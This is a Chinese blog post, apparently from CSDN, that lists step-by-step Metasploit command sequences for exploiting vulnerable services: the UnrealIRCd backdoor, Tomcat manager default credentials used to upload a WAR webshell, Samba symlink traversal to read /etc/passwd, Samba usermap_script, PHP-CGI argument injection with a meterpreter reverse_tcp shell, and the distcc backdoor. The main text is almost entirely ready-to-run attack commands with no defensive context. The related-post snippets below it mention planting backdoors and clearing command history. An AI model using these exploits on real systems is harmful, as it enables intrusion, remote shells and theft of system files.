Metasploit溢出漏洞

最新推荐文章于 2024-05-12 16:27:06 发布
最新推荐文章于 2024-05-12 16:27:06 发布
阅读量734 收藏 1
点赞数
分类专栏: 黑科技 文章标签: 缓冲区溢出 kail Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiyongx/article/details/95006440
版权

废话不多说直接上图帖命令?

  • Metasploit溢出UnrealIRCd后门漏洞(unrealircd 6667)
    1. Nmap  -sV  x.x.x.x //扫描端口,状态,服务,版本号
    2. search unreal ircd
    3. 选择 use exploit/unix/irc/unreal_ircd_3281_backdoor
    4. Show options 设置 rhost
    5. Exploit
  • Metasploit溢出Tomcat管理台默认口令漏洞(http 8180 apache tomcat/coyote jsp)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. 网页进入x.x.x:8180
    3. 进入管理页面(tomcat manager)
    4. Name:tomcat password:tomcat
    5. 点击browse 上传war包 然后按Deploy
    6. 输入http://x.x.x.x:8180/hacker/index.jsp   密码“87966550”
  • Metasploit溢出sysmlink默认配置目录遍历漏洞(samba 139 445)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. Search samba(选择use auxiliary/admin/smb/samba_symlink_traversal)
    3. Info set rhost
    4. Set smbshare tmp //设置SAM可写文件
    5. Expliot
    6. 终端输入    smbclient //x.x.x.x/tmp //回车  不需要密码
    7. cd rootfs        ls(more  /etc/passwd)
  1.  
  • Metasploit溢出samba提权漏洞(samba 139 445)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. Search samba(选择 use exploit/multi/samba/usermap_script)
    3. Info set rhost
    4. Exploit
  • Metasploit溢出phpMyAdmin漏洞(http 80)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. 看到开启的80端口 进入 “http://x.x.x.x”
    3. 用dirbuster扫描目标主机
    4. 选择字典 在/usr/share/dirbuster/wordlists
    5. 扫描结果显示包含cgi-bin目录,phpmyadmin目录
    6. Search php_cgi
    7. Use exploit/multi/http/php_cgi_arg_injection
    8. Show payloads
    9. set payloads php/meterpreter/reverse_tcp
    10. Set lhost    set rhost     exploit
    11. Sysinfo      ls     cat  phpinfo.php
  • Metasploit溢出Distcc后门漏洞(distcc 3632)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. Search distcc_exec
    3. Use exploit/unix/misc/distcc_exec
    4. Show options   set rhost    exploit
    5. Id     ifconfig    whoami
hhiollk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit_中文操作手册
12-03
metasploit中文版,方便入手,内有详细介绍
20210118新版漏洞环境
01-21
此外,可能会包含一些特定的工具和资源,如漏洞扫描器、渗透测试框架(如Metasploit)、安全分析工具等,这些工具可以帮助用户更有效地在环境中进行测试和研究。 总之,20210118新版漏洞环境为用户提供了一个学习和...
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 976
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
android4.0漏洞msf,Metasploit溢出samba提权漏洞
weixin_36307377的博客
06-03 485
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,...
UnrealIRCd后门漏洞
最新发布
m0_62670778的博客
05-12 379
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并且只占用很小的带宽资源。
Metasploit溢出samba提权漏洞
weixin_33862041的博客
12-09 713
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。一、利用nmap工具扫描目标主机1.1使用nmap命令对目...
metasploit---后漏洞利用-提权
孤的博客
11-17 1764
提权就是提升对资源的访问权限,正常情况下,这些资源是否保护的,拒绝普通或为授权用户访问。通过提升权限,恶意用户可以执行为授权的行为,可以对计算机或者整个网络造成危害。 提权广义上分为两种形式 垂直提权:在这种权限提升方式中,低权限的用户或应用程序能够访问那些只针对授权用户或管理员用户才能使用的功能。这种特征也称作权限升级。 水平提权:这种提权通常指的是用户权限在水平方向的扩展,也就是,普通用户能访...
metasploit-lowlevel_metasploit_
10-02
在网络安全领域,Metasploit框架是一个不可或缺的工具,尤其对于那些希望深入学习漏洞利用技术的黑客来说。Metasploit不仅提供了丰富的exploit(漏洞利用)模块,还能帮助安全研究人员理解攻击链的各个环节。本篇...
Metasploit渗透测试指南 修订版
09-21
接下来,书中的重点会放在exploit的使用上,讲解如何利用Metasploit框架执行各种类型的攻击,如缓冲区溢出、SQL注入和远程命令执行等。此外,还会介绍payload的选择和定制,以及如何实现持久化访问,如创建后门。 ...
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
利用MSF溢出攻击讲解
weixin_34417814的博客
07-07 196
msf的强大之处也就不做探讨了,虽然这些东西网上很多。但我想说说我的感受。 这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的 需要说明的一点是 现在的BT5中不像BT4中有postgresql数据库 需要使用的须自行安装。 并且现在msf在4.0以后就没有了db_autopwn. 首先在BT5中打开msf. 创建数据库 ,加载db_autopw...
Metasploitable2 - tcp port 3632 - distccd
Nixawk
07-31 900
msf exploit(distcc_exec) > set RHOST 192.168.1.111 RHOST => 192.168.1.111 msf exploit(distcc_exec) > run [*] Started reverse double handler [*] Accepted the first client connection... [*] Accep
实验五:使用unreal_ircd服务漏洞创建后门并清除痕迹
weixin_45822468的博客
01-15 408
cat /etc/passwd 这个目录下记录了所有登录用户的详细信息在这个地方留下一个后门。在攻击机上用telnet远端登录使用新建的用户登录(只建立用户名可以登 创了密码不行)echo '用户名:登录口令:0:0:注释:主目录:登陆的shell。history-c 清除历史所有命令。
metasploitable2
胡铁威的博客
06-17 1175
nmap使用 nmap –sP IP段/掩码 范围内ping通的所有主机,通过抓包只看到发了arp包,还没有找全局域网内所有主机。 nmap -sP 192.168.43.0/24-PS 让nmap使用SYN包而不是ACK包来对目标主机进行扫描。抓包没有看到syn包,不知道为什么 nmap -sP -PS 192.168.43.0/24 可以比-sP多找到主机-sV 探测打开端口对应服务的版本信息 nmap -sV -Pn IP 扫描目标IP所有开放端口,列出应用版本 nmap -sV
Metasploit攻击linux实例
jjxsir的博客
12-28 3179
一、实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二、实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali linux, IP地址:10.1.1.141 三、实验内容与实验要求 初步了解实验环境及漏洞信息搜集 利用UnrealIRCd后门漏洞攻击漏洞主机 利用Distcc后门漏洞攻击Metasploitable2漏洞主机 Distcc后门漏洞 四、实验过程与分析 查看Metasploitable2漏洞主机的登录用户
linux漏洞UnrealIRCd Backdoor Detection利用
arissa666的博客
07-06 189
用2020版的KAli系统,msf攻击。新版本使用有可能连接不上。UnrealIRCd Backdoor Detection利用。用bash i 建立交互,就可以查看宿主机相关信息了。进入msf查找并使用工具。
究极踩坑版msf6成功复现Distcc后门漏洞
weixin_69925635的博客
07-18 235
使用msf6复现distcc后门漏洞,详细介绍踩坑及纠错过程
kali3、nessus 针对 Metasploitable2-Linux 渗透测试-危急UnrealIRCd后门检测
hzwindpower的博客
01-17 296
1、通过nessus查看到漏洞信息 2、通过kali验证漏洞 CVE-2010-2075,有可以使用的exp 3、查看exp信息 4、执行代码 5、执行成功,查看靶机的信息,查看靶机的ip地址信息
metasploit windows漏洞利用
09-20
Metasploit Framework集成了各种溢出漏洞和流行的shellcode,并且不断更新。你可以使用Metasploit演示攻击不同漏洞,比如Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)。攻击成功后,你将能够在攻击机和目标机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值